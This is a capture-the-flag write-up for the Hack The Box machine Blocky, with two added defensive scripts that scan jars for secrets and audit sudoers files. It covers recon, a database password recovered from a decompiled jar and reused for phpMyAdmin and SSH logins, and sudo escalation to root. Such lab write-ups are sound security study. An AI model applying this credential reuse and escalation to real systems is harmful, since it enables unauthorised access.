🕵 HTB-Writeup : BLOCKY

Recon

Nmap scan

# basic scan
nmap -sC -sV -p- -T5 10.10.10.40

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Several ports are open. Port 80 serves a WordPress site (version 4.8, according to the http-generator tag), and port 25565 runs a Minecraft server.

Directory listing

We enumerate the website's directories with gobuster.

gobuster -u http://blocky.htb -w ~/CTF/TOOLS/wordlist/gobuster-wordlist.txt -t 10

=====================================================
2022/07/24 22:34:48 Starting gobuster
=====================================================
/wp-content (Status: 301)
/wp-includes (Status: 301)
/index.php (Status: 301)
/wp-admin (Status: 301)
/license.txt (Status: 200)
/wp-cron.php (Status: 200)
/wp-load.php (Status: 200)
/wp-links-opml.php (Status: 200)
/wp-blog-header.php (Status: 200)
/wp-login.php (Status: 200)
/wp-mail.php (Status: 403)
/wp-trackback.php (Status: 200)
/.htaccess (Status: 403)
/wp-config.php (Status: 200)
/wp-signup.php (Status: 302)
/wp-activate.php (Status: 302)
/plugins (Status: 301)
/javascript (Status: 301)
/wiki (Status: 301)
/phpmyadmin (Status: 301)
/.htpasswd (Status: 403)
/.htpasswds (Status: 403)
=====================================================

Several interesting paths came up:

  • /phpmyadmin: a phpMyAdmin login page;
  • /wp-login.php: another login page (the WordPress one);
  • /plugins: a directory listing two jar files.

I first tried to decompile the jars using jd-gui.

In the first jar I found a class containing credentials:

// Decompiled from BlockyCore.class (jd-gui output): the database credentials
// are stored as plain-text field initialisers, so they are recoverable by
// anyone who can download the jar.
public class BlockyCore {
  public String sqlHost = "localhost";

  public String sqlUser = "root";

  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
  // ...
}
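The class above is exactly what a pre-release secret scan should catch before a jar is published. As an added example (not part of the original write-up, and not the tooling used in it), the script below parses the constant pool of compiled Java classes directly, without a decompiler, and flags string literals with high entropy together with field names that look like credentials, then runs that check over every .class inside a jar. The sample class and jar are constructed in memory to mimic the decompiled BlockyCore fields; the class-file layout follows the JVM specification's constant-pool format.

```python
"""Added example: flag hard-coded credentials in compiled Java classes.

Not the write-up's tooling. The sample class/jar bytes are constructed for
the demo and are not loadable by a JVM (no methods, no valid this_class);
they only exercise the constant-pool parser.
"""
import io
import math
import re
import struct
import zipfile

# Constant-pool tags (JVM spec, section 4.4)
UTF8, STRING, LONG, DOUBLE = 1, 8, 5, 6
# Payload size in bytes (after the 1-byte tag) of fixed-length entries
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
              15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
IDENTIFIER = re.compile(r"[A-Za-z_$][\w$]*")
SUSPECT_NAME = re.compile(r"pass(word|wd)?|secret|token|api.?key|cred", re.I)


def constant_pool(data: bytes):
    """Parse a class file's constant pool: (utf8 by index, indexes used by CONSTANT_String)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    pos, idx, utf8, strings = 10, 1, {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == UTF8:
            length = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag == STRING:
            strings.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        elif tag in FIXED_SIZE:
            pos += FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant-pool tag {tag}")
        idx += 2 if tag in (LONG, DOUBLE) else 1  # long/double take two slots
    return utf8, strings


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking secrets score well above prose."""
    return -sum(p * math.log2(p) for p in (s.count(c) / len(s) for c in set(s)))


def suspicious_literals(class_bytes: bytes, min_len: int = 12, min_entropy: float = 3.5):
    """Return {'literals': [...], 'fields': [...]} for one class."""
    utf8, strings = constant_pool(class_bytes)
    literals = [utf8[i] for i in strings if i in utf8]
    flagged = [s for s in literals
               if len(s) >= min_len and not s.isspace() and " " not in s
               and shannon_entropy(s) >= min_entropy]
    # Identifiers (field/method names) with credential-like names; literals excluded
    fields = sorted(v for v in utf8.values()
                    if IDENTIFIER.fullmatch(v) and SUSPECT_NAME.search(v) and v not in literals)
    return {"literals": flagged, "fields": fields}


def scan_jar(jar_bytes: bytes):
    """Run suspicious_literals over every .class in a jar (a zip archive)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                found = suspicious_literals(jar.read(name))
                if found["literals"] or found["fields"]:
                    report[name] = found
    return report


def build_sample_class() -> bytes:
    """Constructed stand-in for BlockyCore.class: only the constant pool matters here."""
    pool = []

    def utf8(s):
        pool.append(bytes([UTF8]) + struct.pack(">H", len(s)) + s.encode())
        return len(pool)  # constant-pool indexes are 1-based

    def string(s):
        pool.append(bytes([STRING]) + struct.pack(">H", utf8(s)))

    for name in ("sqlHost", "sqlUser", "sqlPass", "Ljava/lang/String;"):
        utf8(name)
    for literal in ("localhost", "root", "8YsqfCTnvxAUeduzjNSXe22"):
        string(literal)
    header = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, len(pool) + 1)
    trailer = struct.pack(">HHHHHHH", 0x21, 0, 0, 0, 0, 0, 0)  # flags, classes, empty tables
    return header + b"".join(pool) + trailer


def build_sample_jar() -> bytes:
    """Constructed jar containing the sample class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("com/example/BlockyCore.class", build_sample_class())
    return buf.getvalue()


if __name__ == "__main__":
    for cls, found in scan_jar(build_sample_jar()).items():
        print(cls, found)
```

Run against a real jar with `scan_jar(open("plugin.jar", "rb").read())`. The entropy threshold is a heuristic: it catches random-looking tokens like the one above while letting hostnames and short words through, so pair it with the field-name check rather than relying on either alone.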

Exploit

I first tried to log in on the http://blocky.htb/wp-login.php login page with those creds. I was unable to connect.

Then, I managed to log in to the phpMyAdmin service with those credentials. It works!

In the WordPress database, we find the user Notch and his password hash $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/. I tried to brute-force the password, but in vain…

After some time (lost lol), I tried to connect to the server with SSH. First with the root:8YsqfCTnvxAUeduzjNSXe22 creds, unsuccessfully. Then with the notch:8YsqfCTnvxAUeduzjNSXe22 creds. It works!

We first list the commands the user can run with sudo:

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Uhh, the user can run any command as root, so we can simply sudo cat the root flag.
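A `(ALL : ALL) ALL` entry for an ordinary account is the kind of grant a sudoers audit should flag before anyone runs `sudo -l` for you. As an added example (not from the write-up), the script below parses sudoers-style user specifications and reports unrestricted root grants and NOPASSWD entries; the sample sudoers text is constructed and the parser handles the common single-spec line form only (no `:`-separated multiple specs, no commas inside command arguments).

```python
"""Added example: audit sudoers user specifications for risky grants.

Constructed sample input; not the write-up's tooling. Covers lines of the form
  who  host = (runas_user[:runas_group]) [TAG:]... commands
"""
import re

SUDOERS_LINE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"   # user, %group or alias, then host =
    r"(?:\((?P<runas>[^)]*)\)\s*)?"            # optional (runas_user : runas_group)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"               # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$")
SKIP = re.compile(r"^(Defaults|\w+_Alias)\b")  # Defaults lines and alias definitions

SAMPLE_SUDOERS = """\
# constructed sample sudoers file
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
notch   ALL=(ALL : ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(ALL) /usr/bin/rsync
"""


def parse_sudoers(text: str):
    """Return one dict per user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or SKIP.match(line):
            continue
        m = SUDOERS_LINE.match(line)
        if not m:
            continue
        runas = (m["runas"] or "root").split(":")  # sudo defaults to root when omitted
        rules.append({
            "who": m["who"],
            "host": m["host"],
            "runas_user": runas[0].strip(),
            "tags": {t.strip() for t in m["tags"].split(":") if t.strip()},
            "cmds": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def audit(rules):
    """Flag unrestricted root grants for non-root principals and NOPASSWD entries."""
    findings = []
    for r in rules:
        if r["who"] == "root":
            continue  # root gains nothing from sudo
        if "ALL" in r["cmds"] and r["runas_user"] in ("ALL", "root"):
            findings.append((r["who"], "unrestricted root: (ALL) ALL"))
        if "NOPASSWD" in r["tags"]:
            findings.append((r["who"], "NOPASSWD: " + ", ".join(r["cmds"])))
    return findings


def audit_text(text: str):
    return audit(parse_sudoers(text))


if __name__ == "__main__":
    for who, issue in audit_text(SAMPLE_SUDOERS):
        print(f"{who:10} {issue}")
```

Feed it `visudo -c -f` verified files or the output of a configuration export; a group grant such as `%sudo` is reported too, because it is the membership of that group, not the sudoers line, that decides who gets root.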

notch@Blocky:~$ sudo cat /root/root.txt
40913aeae***********************